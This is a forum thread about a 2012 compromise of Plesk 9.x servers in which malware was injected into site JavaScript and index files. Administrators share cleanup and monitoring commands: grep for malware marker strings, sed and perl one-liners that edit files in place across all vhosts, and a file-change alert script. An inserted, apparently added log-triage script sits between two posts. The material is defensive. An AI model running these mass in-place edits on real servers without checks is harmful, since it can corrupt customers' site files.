Security problem with filemng

Discussion in 'Parallels Plesk Panel 9.x for Linux Problems, Suggested Fixes, and How-To' started by galaxy, Jul 2, 2012.

  1. galaxy

    galaxy Kilo Poster

    Messages:
    176
    Hi,

    I've recently had dozens of sites hacked and malware inserted. But what was strange was all the files changed were still owned by the proper owners.

    I did find a file that didn't belong named "index.htm" that had the following contents:

    filemng: Error occured during /bin/cat command.
  2. mikcanavan

    mikcanavan Bit Poster

    Messages:
    21
    Malicious code injection

    Ditto here - lots of different sites, some simple HTML some complex PHP/SQL sites. Maybe something to do with - http://jsunpack.jeek.org ???

    Range of files have been modified, all timestamped approx 14:00 GMT 02/July/2012. The only pattern seems to be that it is common file names, eg jquery.js / cycle.js / dropper.js / index.html

    Example of the code inserted at the end of the facebook.js file : http://pastebin.com/vfhz1ug1

    Would appreciate some feedback from the Plesk team, is this another vulnerability within the control panel?
  3. galaxy

    galaxy Kilo Poster

    Messages:
    176
    It looks like they got copies of people's passwords.

    I was looking at /usr/local/psa/admin/logs/httpsd_access_log

    and see there's people attacking from all over (so they have a network of compromised hosts attacking) going in and changing files throughout the server and inserting malware on home pages and included javascript pages.

    I've spent all day today removing it from hundreds of domains...

    I've disabled file manager (renamed the binary/wrapper), but not sure that's going to stop it yet.
  4. mikcanavan

    mikcanavan Bit Poster

    Messages:
    21
    Yup - I have the same. Apologies Parallels team, compromised Client account, so all domains within client@5 were modified by the attacker.

    Changed the clients control panel password, will now keep an eye out for further access attempts.

    Info from my log for reference:

  5. galaxy

    galaxy Kilo Poster

    Messages:
    176
    It looks like most if not all of my clients were hacked. And they're going directly to each domain's URL to get in. In the log I see each line as:

    123.45.67.89 domain1.com:8443 - ...
    111.22.33.44 domain2.com:8443 - ...
    ...

    I just renamed "filemng" in the /usr/local/psa/admin/bin directory until there's a fix.
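A way to triage the panel access log galaxy is reading, added here as an example and not code from the thread: group port-8443 requests per client IP so that one client logging into many customers' panels stands out. The field layout (client IP, then vhost:port, as in the two quoted lines) is an assumption, and the log lines are constructed.

```shell
#!/bin/sh
# Added example, not from the thread: triage the panel access log by grouping
# port-8443 requests per client IP. The field layout (client IP first, then
# vhost:port) is an assumption; the log lines below are constructed.

# Constructed sample log: one client hits three customers' panels in a row.
SAMPLE_LOG='203.0.113.5 domain1.com:8443 - - [02/Jul/2012:14:01:03 +0000] "POST / HTTP/1.1" 200
203.0.113.5 domain2.com:8443 - - [02/Jul/2012:14:01:09 +0000] "POST / HTTP/1.1" 200
198.51.100.7 domain3.com:8443 - - [02/Jul/2012:14:02:41 +0000] "POST / HTTP/1.1" 200
203.0.113.5 domain3.com:8443 - - [02/Jul/2012:14:02:50 +0000] "POST / HTTP/1.1" 200
192.0.2.10 domain1.com:8443 - - [02/Jul/2012:15:10:00 +0000] "GET / HTTP/1.1" 200
192.0.2.10 domain1.com:80 - - [02/Jul/2012:15:11:00 +0000] "GET / HTTP/1.1" 200'

# Write the constructed log to a temp file and print its path.
write_sample_log() {
  f=$(mktemp); printf '%s\n' "$SAMPLE_LOG" > "$f"; echo "$f"
}

# For each client IP that reached a vhost on port 8443 in log $1, print
# "ip distinct_vhosts requests", most vhosts first. Port 80 traffic is ignored.
panel_clients_by_reach() {
  awk '$2 ~ /:8443$/ {
         key = $1 SUBSEP $2
         if (!(key in seen)) { seen[key] = 1; vhosts[$1]++ }
         hits[$1]++
       }
       END { for (ip in hits) print ip, vhosts[ip], hits[ip] }' "$1" |
    sort -k2,2nr -k3,3nr
}

# Print only the IPs that logged into at least $2 different customers' panels;
# one client working through many accounts is the pattern described above.
flag_wide_reach() {
  panel_clients_by_reach "$1" | awk -v min="$2" '$2 >= min { print $1 }'
}

if [ "${1:-}" = "--demo" ]; then
  log=$(write_sample_log)
  panel_clients_by_reach "$log"
  echo "wide reach (>=2 vhosts):"; flag_wide_reach "$log" 2
fi
```

Run it against the real log by passing its path to `panel_clients_by_reach` instead of the constructed sample.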
  6. IgorG

    IgorG Parallels Team

    Messages:
    16,255
    Well. Some time ago we published KB articles about this SQL injection vulnerability, the method for fixing it, and a script for mass password changing. All these actions should prevent the negative consequences of this vulnerability. But two known problems still remain:

    - infected content was deployed on the Plesk server before applying all the mentioned protection actions and is still working;
    - some users changed their previous passwords (known to hackers) back after running the script for mass password changing;

    Now you can find and remove all infected .js (or other) scripts by their known markers with something like:

    grep -r 'km0ae9gr6m' /var/www/vhosts

    or

    grep -r 'qhk6sa6g1c' /var/www/vhosts

    And you should apply the fix and change passwords with the mass password changing script if you have not performed these protection actions yet.
  7. DiogoR

    DiogoR Bit Poster

    Messages:
    13
    Plesk update.

    Hi.

    I have Plesk 9.3.

    Will the update to most up to date plesk solve this issue?

    Best Regards.
  8. IgorG

    IgorG Parallels Team

    Messages:
    16,255
    Did you read this KB article http://kb.parallels.com/en/113321 ?
  9. DiogoR

    DiogoR Bit Poster

    Messages:
    13
    When I did my last post I renamed the filemng file to prevent its usage and tried to remove all infections I found.

    I'm now monitoring if they appear again.

    I've gone to the page you instructed, downloaded the "checker" and the result is:

    The patch has been successfully applied.

    Does this mean I'm safe and can rename the filemng back to its original name?

    Best Regards.
  10. galaxy

    galaxy Kilo Poster

    Messages:
    176
    I had patched the system for the vulnerability, but then recently (a few months ago), upgraded to 9.5.4. I also have a firewall blocking remote SQL on port 3306. They still got in apparently. I needed to stay in the 9.x realm because I have too many people reliant on the Sitebuilder and have been working to keep it and migrate the sitebuilder 4.5 to another VPS.
  11. IgorG

    IgorG Parallels Team

    Messages:
    16,255
    Did you change all passwords with corresponding script too?
  12. Squeeb

    Squeeb New Member

    Messages:
    18
    Our systems have also been plagued by this attack.

    It's in jquery's and index.html's all over the servers.

    Can you confirm this *is* a vulnerability within the plesk admin section?
  13. Squeeb

    Squeeb New Member

    Messages:
    18
    Seems funny that this attack only just happened to everybody as well.
  14. corncrake

    corncrake Bit Poster

    Messages:
    3
    Ok just registered so I could add to this - exact same hack attempt here.

    If it's already happened - here's some tips.

    Find the files that have been modified in the past day within vhost, try -
    Code:
    find /var/www/vhosts \( -name "*.js" -o -name "*.php" -o -name "index.*" -o -name "default.*" \) -ctime -1
    
    Then if you want to remove the string based on the code shown by the OP at the start you could use (make a backup if you're concerned about the replacement's effect!) -
    Code:
    find /var/www/vhosts \( -name "*.js" -o -name "*.php" -o -name "index.*" -o -name "default.*" \) -ctime -1 -exec sed -i 's/km0ae9gr6m[^>]*qhk6sa6g1c/youreplacementtexthere/g' {} \;
    
    OK, now that the files are clean check the system again for the injected script -
    Code:
    grep -H km0ae9gr6m /var/www/vhosts/* -R | cut -d: -f1
    
    This will just display the files found with the string used at the start of the injected code.

    Hopefully it finds no files

    So what else could be done -

    Rename the plesk filemanager as mentioned above.

    Additionally, to know the next time your files are changed -

    Set up a simple cron script to let you know when files are modified. I use find again but you could use inotify.

    So let's check every 5 min for files that have changed in the last 10 min in vhosts, and send a warning email when this happens (not ideal for servers with 50+ sites, but for smaller sets or just to check a specific site, it's good) -

    Code:
    #!/bin/bash
    # Web files under vhosts whose inode changed in the last 10 minutes
    fts=$(find /var/www/vhosts \( -name "*.js" -o -name "*.php" -o -name "index.*" -o -name "default.*" \) -cmin -10)
    # Mail the list only when something was found
    if [ "$fts" ]; then
        echo "$fts" | mail -s "Files were modified $(date +%Y-%m-%d-%r)" your@email.com
    fi
    
    save this as a script and set it up as a cron job to run every 5 min.

    Finally, if you feel the VPS is compromised and you are paranoid about further attacks - migrate to a new one

    Hope this info is of help and saves some time for others
    Last edited: Jul 4, 2012
  15. Squeeb

    Squeeb New Member

    Messages:
    18
    Heh,
    Nice post :D

    Nice to see us sysadmins thinking alike. Cleaned 100 files so far using the methods above (well, similar methods)
  16. corncrake

    corncrake Bit Poster

    Messages:
    3
    Thanks, any improvements (especially on the sed) let me know, i'm ad-libbing :)

    Another possible point is to see if you can restrict plesk control panel to your ip or at least the port.
  17. Squeeb

    Squeeb New Member

    Messages:
    18
  18. HornWijaya

    HornWijaya New Member

    Messages:
    1
    Here's the perl command line

    Got infected
    System went for upgrade from 9.5.1 to 9.5.4, 5 hours of downtime due to stupid mail_restore (keep rsync -aq the whatever) (lost a few clients along the way) Alas... problem persists.

    grep -R km0ae9gr6m /var/www/vhosts
    get the filenames
    perl -pi -e 'BEGIN{undef $/;} s/\/\*km0ae9gr6m.*qhk6sa6g1c\*\///smg' FILENAME

    I have been running this for days until I gave up (9.5.4 plesk btw), I have just renamed the filemng.

    Was in super old Ensim in FC1 for many many years, and never had such an issue, and it's even more secure with its super chroot environment.

    Hope the command line helps.

    Cheers.
  19. SFMAdmin

    SFMAdmin New Member

    Messages:
    8
    Can Parallels confirm if this is a security issue that will be addressed by a micro update?
    It seems very strange that (a) this exploit didn't arise until July the 2nd and (b) that this has anything to do with the previous exploit.

    This looks to me like the micro patches were not effective.
  20. AlexandreS

    AlexandreS New Member

    Messages:
    19
    Same here, and the fix was already applied (KB 113424):

    > php -d safe_mode=0 plesk_remote_vulnerability_checker.php
    The patch has been successfully applied.
